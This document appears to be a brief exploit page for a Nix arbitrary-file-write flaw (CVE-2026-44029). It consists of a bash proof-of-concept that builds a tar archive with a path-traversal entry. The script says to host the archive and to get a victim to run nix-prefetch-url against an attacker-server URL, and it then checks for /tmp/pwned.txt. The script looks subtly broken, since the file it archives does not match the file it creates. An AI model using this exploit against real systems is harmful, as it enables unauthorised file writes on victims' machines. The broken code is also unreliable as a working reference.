CVE-2026-44029 Nix 任意文件写入漏洞

#!/bin/bash # PoC for CVE-2026-44029: Nix Directory Traversal / Arbitrary File Write # 1. Create a directory structure for the malicious payload mkdir -p poc_exploit # 2. Create a file to be written to an arbitrary location (e.g., /tmp/pwned.txt) echo "CVE-2026-44029 Exploited: Arbitrary write successful" > poc_exploit/data.txt # 3. Create a tar archive containing the file with a path traversal sequence # Note: Modern tar tools may warn or block this, but the vulnerable Nix version processes it. # Using --absolute-names or constructing the symlink manually might be needed depending on the implementation. cd poc_exploit tar --absolute-names -cf ../malicious.tar ./../../../../tmp/pwned.txt cd .. # 4. Simulate hosting the file (in a real scenario, host this on a web server) echo "Host malicious.tar on a server accessible by the target." # 5. Trigger the vulnerable command on the target system # The attacker tricks the victim/system into running: # nix-prefetch-url --unpack http://attacker-server/malicious.tar # Verification: Check if the file was written to /tmp/ if [ -f "/tmp/pwned.txt" ]; then echo "[+] Exploit successful: File written to /tmp/pwned.txt" cat /tmp/pwned.txt else echo "[-] Exploit failed or not executed" fi